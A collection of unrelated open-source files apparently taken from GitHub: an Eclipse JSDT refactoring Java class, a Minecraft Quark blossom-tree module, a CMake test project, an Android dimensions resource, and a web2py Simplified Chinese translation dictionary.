* which accompanies this distribution, and is available at
* http://www.eclipse.org/legal/epl-v10.html
*
* Contributors:
* IBM Corporation - initial API and implementation
*******************************************************************************/
package org.eclipse.wst.jsdt.internal.corext.refactoring.changes;
import org.eclipse.core.runtime.Assert;
import org.eclipse.ltk.core.refactoring.Change;
import org.eclipse.ltk.core.refactoring.ChangeDescriptor;
import org.eclipse.ltk.core.refactoring.CompositeChange;
import org.eclipse.ltk.core.refactoring.RefactoringChangeDescriptor;
import org.eclipse.ltk.core.refactoring.RefactoringDescriptor;
/**
* Composite change with an associated refactoring descriptor.
*/
public final class RefactoringDescriptorChange extends CompositeChange {
/** The refactoring descriptor */
private RefactoringDescriptor fDescriptor;
/**
* Creates a new refactoring descriptor change.
*
* @param descriptor
* the refactoring descriptor
* @param name
* the name
*/
public RefactoringDescriptorChange(final RefactoringDescriptor descriptor, final String name) {
super(name);
Assert.isNotNull(descriptor);
fDescriptor= descriptor;
}
/**
* Creates a new refactoring descriptor change.
*
* @param descriptor
* the refactoring descriptor
* @param name
* the name
* @param changes
* the changes
*/
public RefactoringDescriptorChange(final RefactoringDescriptor descriptor, final String name, final Change[] changes) {
super(name, changes);
Assert.isNotNull(descriptor);
fDescriptor= descriptor;
}
/**
* {@inheritDoc}
*/
public ChangeDescriptor getDescriptor() {
return new RefactoringChangeDescriptor(fDescriptor);
}
}
| {
"pile_set_name": "Github"
} |
package vazkii.quark.world.module;
import java.util.HashMap;
import java.util.Map;
import com.google.common.base.Functions;
import net.minecraft.block.ComposterBlock;
import net.minecraft.block.material.MaterialColor;
import net.minecraft.item.Items;
import net.minecraft.world.gen.GenerationStage.Decoration;
import net.minecraftforge.common.BiomeDictionary;
import vazkii.quark.base.handler.VariantHandler;
import vazkii.quark.base.module.Config;
import vazkii.quark.base.module.LoadModule;
import vazkii.quark.base.module.Module;
import vazkii.quark.base.module.ModuleCategory;
import vazkii.quark.base.world.WorldGenHandler;
import vazkii.quark.base.world.WorldGenWeights;
import vazkii.quark.world.block.BlossomLeavesBlock;
import vazkii.quark.world.block.BlossomSaplingBlock;
import vazkii.quark.world.block.BlossomSaplingBlock.BlossomTree;
import vazkii.quark.world.config.BlossomTreeConfig;
import vazkii.quark.world.gen.BlossomTreeGenerator;
@LoadModule(category = ModuleCategory.WORLD)
public class BlossomTreesModule extends Module {
@Config BlossomTreeConfig blue = new BlossomTreeConfig(200, BiomeDictionary.Type.COLD);
@Config BlossomTreeConfig lavender = new BlossomTreeConfig(100, BiomeDictionary.Type.SWAMP);
@Config BlossomTreeConfig orange = new BlossomTreeConfig(100, BiomeDictionary.Type.SAVANNA);
@Config BlossomTreeConfig pink = new BlossomTreeConfig(100, BiomeDictionary.Type.MOUNTAIN);
@Config BlossomTreeConfig yellow = new BlossomTreeConfig(200, BiomeDictionary.Type.PLAINS);
public static Map<BlossomTree, BlossomTreeConfig> trees = new HashMap<>();
@Override
public void construct() {
add("blue", MaterialColor.LIGHT_BLUE, blue);
add("lavender", MaterialColor.PINK, lavender);
add("orange", MaterialColor.ORANGE_TERRACOTTA, orange);
add("pink", MaterialColor.PINK, pink);
add("yellow", MaterialColor.YELLOW, yellow);
}
@Override
public void setup() {
trees.forEach((tree, config) -> {
ComposterBlock.CHANCES.put(tree.leaf.getBlock().asItem(), 0.3F);
ComposterBlock.CHANCES.put(tree.sapling.asItem(), 0.3F);
WorldGenHandler.addGenerator(this, new BlossomTreeGenerator(config, tree), Decoration.TOP_LAYER_MODIFICATION, WorldGenWeights.BLOSSOM_TREES);
});
}
private void add(String colorName, MaterialColor color, BlossomTreeConfig config) {
BlossomLeavesBlock leaves = new BlossomLeavesBlock(colorName, this, color);
BlossomTree tree = new BlossomTree(leaves);
BlossomSaplingBlock sapling = new BlossomSaplingBlock(colorName, this, tree, leaves);
VariantHandler.addFlowerPot(sapling, sapling.getRegistryName().getPath(), Functions.identity());
trees.put(tree, config);
}
}
| {
"pile_set_name": "Github"
} |
# a simple C++ only test case
cmake_minimum_required (VERSION 2.6)
project (CompileCommandOutput CXX)
set(CMAKE_EXPORT_COMPILE_COMMANDS ON)
set(CMAKE_DEBUG_POSTFIX "_test_debug_postfix")
if(MAKE_SUPPORTS_SPACES)
set(test1_srcs "file with spaces.cxx")
else()
set(test1_srcs "file_with_underscores.cxx")
endif()
add_library(test1 STATIC ${test1_srcs})
add_library(test2 SHARED "../CompileCommandOutput/relative.cxx")
include_directories(${CompileCommandOutput_SOURCE_DIR}/../../Source)
add_executable(CompileCommandOutput compile_command_output.cxx)
target_link_libraries(CompileCommandOutput test1 test2)
| {
"pile_set_name": "Github"
} |
<resources>
<!-- Example customization of dimensions originally defined in res/values/dimens.xml
(such as screen margins) for screens with more than 820dp of available width. This
would include 7" and 10" devices in landscape (~960dp and ~1280dp respectively). -->
<dimen name="activity_horizontal_margin">64dp</dimen>
</resources>
| {
"pile_set_name": "Github"
} |
# -*- coding: utf-8 -*-
{
'!langcode!': 'zh-cn',
'!langname!': '中文',
'"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN': '"update" 应为选择表达式, 格式如 "field1=\'value\'". 但是对 JOIN 的结果不可以使用 update 或者 delete"',
'%s %%{row} deleted': '已删除 %s 笔',
'%s %%{row} updated': '已更新 %s 笔',
'%s selected': '%s 已选择',
'%Y-%m-%d': '%Y-%m-%d',
'%Y-%m-%d %H:%M:%S': '%Y-%m-%d %H:%M:%S',
'(**%.0d MB**)': '(**%.0d MB**)',
'(something like "it-it")': '(格式类似 "zh-tw")',
'**%(items)s** %%{item(items)}, **%(bytes)s** %%{byte(bytes)}': '**%(items)s** %%{item(items)}, **%(bytes)s** %%{byte(bytes)}',
'**%(items)s** items, **%(bytes)s** %%{byte(bytes)}': '**%(items)s** items, **%(bytes)s** %%{byte(bytes)}',
'**not available** (requires the Python [[guppy http://pypi.python.org/pypi/guppy/ popup]] library)': '**not available** (requires the Python [[guppy http://pypi.python.org/pypi/guppy/ popup]] library)',
'?': '?',
'``**not available**``:red (requires the Python [[guppy http://pypi.python.org/pypi/guppy/ popup]] library)': '``**not available**``:red (requires the Python [[guppy http://pypi.python.org/pypi/guppy/ popup]] library)',
'A new version of web2py is available': '新版 web2py 已推出',
'A new version of web2py is available: %s': '新版 web2py 已推出: %s',
'about': '关于',
'About': '关于',
'About application': '关于本应用程序',
'Access Control': 'Access Control',
'admin': 'admin',
'Admin is disabled because insecure channel': '管理功能(Admin)在非安全连接环境下自动关闭',
'Admin is disabled because unsecure channel': '管理功能(Admin)在非安全连接环境下自动关闭',
'Administrative Interface': 'Administrative Interface',
'Administrative interface': '点击进入管理界面',
'Administrator Password:': '管理员密码:',
'Ajax Recipes': 'Ajax Recipes',
'An error occured, please %s the page': 'An error occured, please %s the page',
'An error occured, please [[reload %s]] the page': 'An error occured, please [[reload %s]] the page',
'appadmin is disabled because insecure channel': '管理界面在非安全通道下被禁用',
'Are you sure you want to delete file "%s"?': '确定要删除文件"%s"?',
'Are you sure you want to delete this object?': '确定要删除该对象么?',
'Are you sure you want to uninstall application "%s"': '确定要删除应用程序 "%s"',
'Are you sure you want to uninstall application "%s"?': '确定要删除应用程序 "%s"',
'ATTENTION: Login requires a secure (HTTPS) connection or running on localhost.': '注意: 登录管理账号需要安全连接(HTTPS)或是在本地连接(localhost).',
'ATTENTION: TESTING IS NOT THREAD SAFE SO DO NOT PERFORM MULTIPLE TESTS CONCURRENTLY.': '注意: 因为在测试模式不保证多线程安全性,所以不可同时执行多个测试案例',
'ATTENTION: you cannot edit the running application!': '注意:不可编辑正在执行的应用程序!',
'Authentication': '验证',
'Available Databases and Tables': '可提供的数据库和数据表',
'Buy this book': '购买本书',
"Buy web2py's book": "Buy web2py's book",
'cache': '高速缓存',
'Cache': 'Cache',
'Cache Cleared': 'Cache Cleared',
'Cache contains items up to **%(hours)02d** %%{hour(hours)} **%(min)02d** %%{minute(min)} **%(sec)02d** %%{second(sec)} old.': 'Cache contains items up to **%(hours)02d** %%{hour(hours)} **%(min)02d** %%{minute(min)} **%(sec)02d** %%{second(sec)} old.',
'Cache Keys': 'Cache Keys',
'Cannot be empty': '不可空白',
'Cannot compile: there are errors in your app. Debug it, correct errors and try again.': '编译失败:应用程序有错误,请排除错误后再尝试编译.',
'Change Password': '修改密码',
'change password': '修改密码',
'Check to delete': '打勾以示删除',
'Check to delete:': '打勾以示删除:',
'Clear CACHE?': 'Clear CACHE?',
'Clear DISK': 'Clear DISK',
'Clear RAM': 'Clear RAM',
'Client IP': '客户端网址(IP)',
'Community': 'Community',
'Components and Plugins': 'Components and Plugins',
'Config.ini': 'Config.ini',
'Controller': '控件',
'Controllers': '控件',
'Copyright': '版权所有',
'Create new application': '创建应用程序',
'Created By': 'Created By',
'Created On': 'Created On',
'Current request': '当前网络要求(request)',
'Current response': '当前网络响应(response)',
'Current session': '当前网络连接信息(session)',
'customize me!': '请调整我!',
'data uploaded': '数据已上传',
'Database': '数据库',
'Database %s select': '已选择 %s 数据库',
'Database Administration (appadmin)': 'Database Administration (appadmin)',
'Date and Time': '日期和时间',
'db': 'db',
'DB Model': '数据库模型',
'Delete': '删除',
'Delete:': '删除:',
'Demo': 'Demo',
'Deploy on Google App Engine': '发布到 Google App Engine',
'Deployment Recipes': 'Deployment Recipes',
'Description': '描述',
'DESIGN': '设计',
'Design': 'Design',
'design': '设计',
'Design for': '设计用于',
'DISK': 'DISK',
'Disk Cache Keys': 'Disk Cache Keys',
'Disk Cleared': 'Disk Cleared',
'DISK contains items up to **%(hours)02d** %%{hour(hours)} **%(min)02d** %%{minute(min)} **%(sec)02d** %%{second(sec)} old.': 'DISK contains items up to **%(hours)02d** %%{hour(hours)} **%(min)02d** %%{minute(min)} **%(sec)02d** %%{second(sec)} old.',
'Documentation': 'Documentation',
"Don't know what to do?": "Don't know what to do?",
'done!': '完成!',
'Download': '下载',
'E-mail': '电子邮件',
'EDIT': '编辑',
'Edit': '编辑',
'Edit application': '编辑应用程序',
'Edit current record': '编辑当前记录',
'edit profile': '编辑配置文件',
'Edit Profile': '编辑配置文件',
'Edit This App': '编辑本应用程序',
'Editing file': '编辑文件',
'Editing file "%s"': '编辑文件"%s"',
'Email and SMS': 'Email and SMS',
'enter an integer between %(min)g and %(max)g': 'enter an integer between %(min)g and %(max)g',
'Error logs for "%(app)s"': '"%(app)s"的错误记录',
'Errors': 'Errors',
'export as csv file': '以CSV格式导出',
'FAQ': 'FAQ',
'First name': '名',
'Forgot username?': '忘记用户名?',
'Forms and Validators': 'Forms and Validators',
'Free Applications': 'Free Applications',
'Functions with no doctests will result in [passed] tests.': '沒有 doctests 的函数会显示 [passed].',
'Graph Model': 'Graph Model',
'Group ID': '群组编号',
'Groups': 'Groups',
'Hello World': 'Hello World',
'Helping web2py': 'Helping web2py',
'Hit Ratio: **%(ratio)s%%** (**%(hits)s** %%{hit(hits)} and **%(misses)s** %%{miss(misses)})': 'Hit Ratio: **%(ratio)s%%** (**%(hits)s** %%{hit(hits)} and **%(misses)s** %%{miss(misses)})',
'Home': 'Home',
'How did you get here?': 'How did you get here?',
'import': 'import',
'Import/Export': '导入/导出',
'Index': '索引',
'insert new': '插入新纪录',
'insert new %s': '插入新纪录 %s',
'Installed applications': '已安裝应用程序',
'Internal State': '內部状态',
'Introduction': 'Introduction',
'Invalid action': '非法操作(action)',
'Invalid email': '不符合电子邮件格式',
'Invalid Query': '无效的查询请求',
'invalid request': '网络要求无效',
'Is Active': 'Is Active',
'Key': 'Key',
'Language files (static strings) updated': '语言文件已更新',
'Languages': '各国语言',
'Last name': '姓',
'Last saved on:': '最后保存时间:',
'Layout': '网页布局',
'Layout Plugins': 'Layout Plugins',
'Layouts': 'Layouts',
'License for': '软件授权',
'Live Chat': 'Live Chat',
'Log In': 'Log In',
'login': '登录',
'Login': '登录',
'Login to the Administrative Interface': '登录到管理员界面',
'logout': '登出',
'Logout': '登出',
'Lost Password': '忘记密码',
'Lost password?': '忘记密码?',
'Main Menu': '主菜单',
'Manage %(action)s': 'Manage %(action)s',
'Manage Access Control': 'Manage Access Control',
'Manage Cache': 'Manage Cache',
'Memberships': 'Memberships',
'Menu Model': '菜单模型(menu)',
'Models': '数据模型',
'Modified By': '修改者',
'Modified On': '修改时间',
'Modules': '程序模块',
'My Sites': 'My Sites',
'Name': '名字',
'New Record': '新记录',
'new record inserted': '已插入新记录',
'next %s rows': 'next %s rows',
'next 100 rows': '往后 100 笔',
'NO': '否',
'No databases in this application': '该应用程序不含数据库',
'Number of entries: **%s**': 'Number of entries: **%s**',
'Object or table name': 'Object or table name',
'Online book': 'Online book',
'Online examples': '点击进入在线例子',
'or import from csv file': '或导入CSV文件',
'Origin': '原文',
'Original/Translation': '原文/翻译',
'Other Plugins': 'Other Plugins',
'Other Recipes': 'Other Recipes',
'Overview': '概览',
'Password': '密码',
"Password fields don't match": '密码不匹配',
'Peeking at file': '选择文件',
'Permission': 'Permission',
'Permissions': 'Permissions',
'Plugins': 'Plugins',
'Powered by': '基于下列技术构建:',
'Preface': 'Preface',
'previous %s rows': 'previous %s rows',
'previous 100 rows': '往前 100 笔',
'pygraphviz library not found': 'pygraphviz library not found',
'Python': 'Python',
'Query:': '查询:',
'Quick Examples': 'Quick Examples',
'RAM': 'RAM',
'RAM Cache Keys': 'RAM Cache Keys',
'Ram Cleared': 'Ram Cleared',
'RAM contains items up to **%(hours)02d** %%{hour(hours)} **%(min)02d** %%{minute(min)} **%(sec)02d** %%{second(sec)} old.': 'RAM contains items up to **%(hours)02d** %%{hour(hours)} **%(min)02d** %%{minute(min)} **%(sec)02d** %%{second(sec)} old.',
'Recipes': 'Recipes',
'Record': '记录',
'record does not exist': '记录不存在',
'Record ID': '记录编号',
'Record id': '记录编号',
'Register': '注册',
'register': '注册',
'Registration identifier': 'Registration identifier',
'Registration key': '注册密钥',
'reload': 'reload',
'Remember me (for 30 days)': '记住我(30 天)',
'Reset Password key': '重置密码',
'Resolve Conflict file': '解决冲突文件',
'Role': '角色',
'Roles': 'Roles',
'Rows in Table': '在数据表里的记录',
'Rows selected': '笔记录被选择',
'Save model as...': 'Save model as...',
'Saved file hash:': '已保存文件的哈希值:',
'Semantic': 'Semantic',
'Services': 'Services',
'Sign Up': 'Sign Up',
'Size of cache:': 'Size of cache:',
'state': '状态',
'Static files': '静态文件',
'Statistics': '统计数据',
'Stylesheet': '网页样式表',
'submit': '提交',
'Submit': '提交',
'Support': 'Support',
'Sure you want to delete this object?': '确定要删除此对象?',
'Table': '数据表',
'Table name': '数据表名称',
'Testing application': '测试中的应用程序',
'The "query" is a condition like "db.table1.field1==\'value\'". Something like "db.table1.field1==db.table2.field2" results in a SQL JOIN.': '"query"应是类似 "db.table1.field1==\'value\'" 的条件表达式. "db.table1.field1==db.table2.field2"的形式则代表执行 JOIN SQL.',
'The Core': 'The Core',
'The output of the file is a dictionary that was rendered by the view %s': 'The output of the file is a dictionary that was rendered by the view %s',
'The Views': '视图',
'There are no controllers': '沒有控件(controllers)',
'There are no models': '沒有数据库模型(models)',
'There are no modules': '沒有程序模块(modules)',
'There are no static files': '沒有静态文件',
'There are no translators, only default language is supported': '沒有对应的语言文件,仅支持原始语言',
'There are no views': '沒有视图',
'This App': '该应用',
'This is the %(filename)s template': '这是%(filename)s文件的模板(template)',
'Ticket': '问题清单',
'Time in Cache (h:m:s)': 'Time in Cache (h:m:s)',
'Timestamp': '时间戳',
'Traceback': 'Traceback',
'Twitter': 'Twitter',
'Unable to check for upgrades': '查询新版本失败',
'Unable to download': '无法下载',
'Unable to download app': '无法下载应用程序',
'unable to parse csv file': '无法解析CSV文件',
'Update:': '更新:',
'Upload existing application': '上传已有应用程序',
'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.': '使用下列方式可得到更复杂的条件表达式, (...)&(...) 代表必须都满足, (...)|(...) 代表其一, ~(...)则代表否.',
'User': 'User',
'User %(id)s Logged-in': '用户 %(id)s 已登录',
'User %(id)s Registered': '用户 %(id)s 已注册',
'User ID': '用户编号',
'Users': 'Users',
'Verify Password': '验证密码',
'Videos': '视频',
'View': '查看',
'Views': '视图',
'Welcome': '欢迎',
'Welcome %s': '欢迎 %s',
'Welcome to web2py': '欢迎使用 web2py',
'Welcome to web2py!': '欢迎使用 web2py!',
'Which called the function %s located in the file %s': 'Which called the function %s located in the file %s',
'Working...': 'Working...',
'YES': '是',
'You are successfully running web2py': '您已成功运行 web2py',
'You can modify this application and adapt it to your needs': '请根据您的需要修改本程序',
'You visited the url %s': 'You visited the url %s',
}
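At runtime a file like this is just a dictionary keyed by the original English string; the translator looks the message up and falls back to the key when no translation exists (which is why many entries above map to themselves). A rough standalone sketch of that lookup in plain Python, not web2py's actual gluon.languages implementation:

translations = {
    'Welcome %s': '欢迎 %s',
    'Logout': '登出',
}

def T(message, *args):
    # Fall back to the original English string when no translation is present.
    text = translations.get(message, message)
    return text % args if args else text

print(T('Welcome %s', 'web2py'))   # 欢迎 web2py
print(T('Cache Keys'))             # Cache Keys (no entry, falls back to the key)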
| {
"pile_set_name": "Github"
} |